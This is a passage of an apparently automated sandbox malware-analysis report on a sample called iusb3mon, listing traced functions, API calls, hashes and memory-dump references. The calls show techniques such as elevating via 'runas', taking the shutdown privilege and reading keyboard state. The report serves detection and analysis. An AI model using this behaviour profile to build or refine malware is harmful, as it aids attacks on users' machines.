                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID: ACP$OCP
                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                    • Opcode ID: 339e03542f57714a1d34b5cc6ce93c04afaae7b64395bb032138516833f176d0
                                                                                                                    • Instruction ID: 12d83c4f6769c4e4675bba40c09a6b0138af8f08c87c75ef476bb2e06be9c32d
                                                                                                                    • Opcode Fuzzy Hash: 339e03542f57714a1d34b5cc6ce93c04afaae7b64395bb032138516833f176d0
                                                                                                                    • Instruction Fuzzy Hash: 1B21C132B00980A6DB388F57C904A9FB3E6BF54B55B9A8474EA0AD7144E772FD81C352
                                                                                                                    Function 06244652 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 06244681
                                                                                                                      • Part of subcall function 0624461E: GetVersionExA.KERNEL32(?), ref: 06244638
                                                                                                                    • ShellExecuteExA.SHELL32(0000003C), ref: 062446F2
                                                                                                                    • ExitProcess.KERNEL32 ref: 062446FE
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ExecuteExitFileModuleNameProcessShellVersion
                                                                                                                    • String ID: <$runas
                                                                                                                    • API String ID: 984616556-1187129395
                                                                                                                    • Opcode ID: 030fb05df5d50a574afea9a8b842895ee53fb0aac2525b3d87986feff66b6aad
                                                                                                                    • Instruction ID: c303a2e9567f552b32e5a35a787a8cbe68f90d5b8ab7db437d0ce91af289b07a
                                                                                                                    • Opcode Fuzzy Hash: 030fb05df5d50a574afea9a8b842895ee53fb0aac2525b3d87986feff66b6aad
                                                                                                                    • Instruction Fuzzy Hash: 54114F72D14359AAEF65EBA5EC09BC9BBF5BB08304F0044A5E708F6190DB709688CF14
                                                                                                                    Function 062472F5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 35COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                      • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0624732E
                                                                                                                    • wsprintfA.USER32 ref: 06247343
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeInfoLoadSystemwsprintf
                                                                                                                    • String ID: %d*%sMHz$HARDWARE\DESCRIPTION\System\CentralProcessor\0$~MHz
                                                                                                                    • API String ID: 3469679427-2169120903
                                                                                                                    • Opcode ID: b06cdd400b3a2182089cb28a58f1a0d0952cd26226a554c517a6dd08bceb4d04
                                                                                                                    • Instruction ID: 5bc8939486792669b8af9c461bf1a24643b784a2ad54a99be3d25a2a6b9ce6bf
                                                                                                                    • Opcode Fuzzy Hash: b06cdd400b3a2182089cb28a58f1a0d0952cd26226a554c517a6dd08bceb4d04
                                                                                                                    • Instruction Fuzzy Hash: 1DF0E276D20208BFEF04EBE8DC4AEAEBB3D9B08200F004014FF20F2041E67096508B65
                                                                                                                    Function 001EA517 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 001E0B40: GetLastError.KERNEL32(?,00000008,001E49F0), ref: 001E0B44
                                                                                                                      • Part of subcall function 001E0B40: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 001E0BE6
                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 001EA623
                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 001EA66C
                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 001EA67B
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,?,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 001EA6C3
                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 001EA6E2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 415426439-0
                                                                                                                    • Opcode ID: 1e911b659cca603db4d3f9874705adb5e052ed16914eaa5c066258c746e1681e
                                                                                                                    • Instruction ID: 945255be63a420b0dcbc1a16e6c88e24e73a4fcb50fdbf2c495a6d1bafe91ee2
                                                                                                                    • Opcode Fuzzy Hash: 1e911b659cca603db4d3f9874705adb5e052ed16914eaa5c066258c746e1681e
                                                                                                                    • Instruction Fuzzy Hash: 3251B471A00A85AFDB10DFA6CC41ABEB7B8BF19700F494469F905EB190E770E944CB62
                                                                                                                    Function 001E9BB3 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 001E0B40: GetLastError.KERNEL32(?,00000008,001E49F0), ref: 001E0B44
                                                                                                                      • Part of subcall function 001E0B40: SetLastError.KERNEL32(00000000,?,00000006,000000FF), ref: 001E0BE6
                                                                                                                    • GetACP.KERNEL32(?,?,?,?,?,?,001DE45B,?,?,?,?,?,-00000050,?,?,?), ref: 001E9C74
                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,001DE45B,?,?,?,?,?,-00000050,?,?), ref: 001E9C9F
                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,?,00000000,?), ref: 001E9E02
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                                                    • String ID: utf8
                                                                                                                    • API String ID: 607553120-905460609
                                                                                                                    • Opcode ID: 8309a295d49f31054a21167eac9f3e26b5c30af17f27cbb74210efd025eb9b8a
                                                                                                                    • Instruction ID: fbe92c7463f85abb48ebcc5f49423cffc2baf64fd39f05d194bdd217b8ae7e8e
                                                                                                                    • Opcode Fuzzy Hash: 8309a295d49f31054a21167eac9f3e26b5c30af17f27cbb74210efd025eb9b8a
                                                                                                                    • Instruction Fuzzy Hash: A171F672600A92AADB29BB77CC42BAE73E8FF55710F14442AF505DB181FBB0ED408761
                                                                                                                    Function 0625ABEF Relevance: 6.0, APIs: 4, Instructions: 38keyboardwindowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0625B4CB: GetWindowLongA.USER32(?,000000F0), ref: 0625B4D7
                                                                                                                    • GetKeyState.USER32(00000010), ref: 0625AC13
                                                                                                                    • GetKeyState.USER32(00000011), ref: 0625AC1C
                                                                                                                    • GetKeyState.USER32(00000012), ref: 0625AC25
                                                                                                                    • SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 0625AC3B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: State$LongMessageSendWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1063413437-0
                                                                                                                    • Opcode ID: c42cb25e56162f122cda6e8286d7d6fbfc15b1771cde55c31d140c42a37c21d0
                                                                                                                    • Instruction ID: c332113a2f39cd2ac01bcb105322209a2e078abe922fa464d789466f15f2e9f4
                                                                                                                    • Opcode Fuzzy Hash: c42cb25e56162f122cda6e8286d7d6fbfc15b1771cde55c31d140c42a37c21d0
                                                                                                                    • Instruction Fuzzy Hash: F0F0A7B6B6035A67EBB836641C87FD551154F41BD3F038630EF516A0D48BB184428A74
                                                                                                                    Function 001D6340 Relevance: 6.0, APIs: 4, Instructions: 12COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,001D6460,001EF12C), ref: 001D6345
                                                                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,001D6460,001EF12C), ref: 001D634E
                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409,?,001D6460,001EF12C), ref: 001D6359
                                                                                                                    • TerminateProcess.KERNEL32(00000000,?,001D6460,001EF12C), ref: 001D6360
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3231755760-0
                                                                                                                    • Opcode ID: 642b5ec14da91c08c6534fe15aea2af867b6e4e413dbdad22b633322c930cfbf
                                                                                                                    • Instruction ID: 69d4ab88af116b44b960f8cac9949619c01efb3979a9f4d9873dc8012c7bcd64
                                                                                                                    • Opcode Fuzzy Hash: 642b5ec14da91c08c6534fe15aea2af867b6e4e413dbdad22b633322c930cfbf
                                                                                                                    • Instruction Fuzzy Hash: 45D01231200144EBDF402FE0ED8CA4C3FA9FB04312F044400F30B898B1DBB145808B63
                                                                                                                    Function 06253F29 Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 538cac0e5344a719ed3e37c4edc046d2dd1844d669b384e592b4c244c524ab55
                                                                                                                    • Instruction ID: 99523f3ae6b2fccd4ce789828afcb75b770712827d6454440d4d659a5be61f80
                                                                                                                    • Opcode Fuzzy Hash: 538cac0e5344a719ed3e37c4edc046d2dd1844d669b384e592b4c244c524ab55
                                                                                                                    • Instruction Fuzzy Hash: B5F01D3192420ABFDBA1DF61DC08AAA7BB9AB043C4B069421FD55D5060F770C611CB91
                                                                                                                    Function 062439EC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17shutdownCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(ADVAPI32.dll,00000000,SeShutdownPrivilege,?,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624900F
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,OpenProcessToken), ref: 0624901F
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,AdjustTokenPrivileges), ref: 0624902A
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,LookupPrivilegeValueA), ref: 06249035
                                                                                                                      • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(kernel32.dll,?,062439FA,SeShutdownPrivilege,00000001,?,0624200F,?), ref: 0624903F
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,GetCurrentProcess), ref: 0624904A
                                                                                                                      • Part of subcall function 06248FF7: LoadLibraryA.KERNEL32(KERNEL32.dll), ref: 06249092
                                                                                                                      • Part of subcall function 06248FF7: GetProcAddress.KERNEL32(00000000,GetLastError), ref: 0624909A
                                                                                                                      • Part of subcall function 06248FF7: CloseHandle.KERNEL32(?), ref: 062490A9
                                                                                                                      • Part of subcall function 06248FF7: FreeLibrary.KERNEL32(00000000), ref: 062490BA
                                                                                                                      • Part of subcall function 06248FF7: FreeLibrary.KERNEL32(00000000), ref: 062490C5
                                                                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 06243A02
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
